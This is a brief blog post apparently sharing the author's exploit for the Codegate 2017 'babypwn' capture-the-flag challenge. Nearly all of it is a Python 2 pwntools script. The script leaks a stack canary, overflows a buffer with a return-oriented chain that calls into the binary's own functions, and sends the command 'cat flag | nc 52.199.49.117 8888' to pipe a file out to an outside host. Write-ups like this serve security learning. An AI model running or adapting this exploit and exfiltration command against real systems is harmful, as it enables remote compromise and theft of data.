cdor1's lab

Codegate 2017 babypwn

Cdor1 2017. 2. 13. 17:45

Notes: my first exploit against a socket program.

The fd gave me a hard time.


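# Python 2 script using pwntools.
from pwn import *
#s = remote('localhost', 8181)
s = remote('110.10.212.130', 8888)

# Stage 1: leak the stack canary through menu option 1.
# 40 'a' bytes plus the newline added by sendline are sent; the script then
# reads the three bytes echoed after them and rebuilds the canary with a
# 0x00 low byte.
print s.recvuntil('Select menu > ')
s.sendline('1')
print s.recvuntil('Input Your Message : ')
s.sendline('a'*40)
print s.recvuntil('a'*40 + '\n')
canary = u32('\x00' + s.recv(3))
log.info('canary : ' + hex(canary))
raw_input()  # pause before the second stage

# Stage 2: overflow through menu option 1 again, keeping the canary intact.
print s.recvuntil('Select menu > ')
s.sendline('1')
print s.recvuntil('Input Your Message : ')

payload = 'A'*40            # padding up to the canary
payload += p32(canary)      # leaked canary, written back unchanged
payload += 'A'*12           # padding up to the saved return address
payload += p32(0x080486E0)  # first call in the chain
payload += p32(0x08048EEC)  # return address for the first call
payload += p32(4)           # argument 1 (presumably the fd from the notes above)
payload += p32(0x0804b1b4)  # argument 2
payload += p32(100)         # argument 3
payload += p32(0)           # argument 4
payload += p32(0x08048620)  # second call in the chain
payload += 'AAAA'           # filler return address for the second call
payload += p32(0x0804b1b4)  # its argument: same address as argument 2 above
s.sendline(payload)

# Menu option 3 is selected after the overflow has been sent.
print s.recvuntil('Select menu > ')
s.sendline('3')

# Command string sent over the socket after the chain has been set up.
s.sendline('cat flag | nc 52.199.49.117 8888')

s.interactive()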
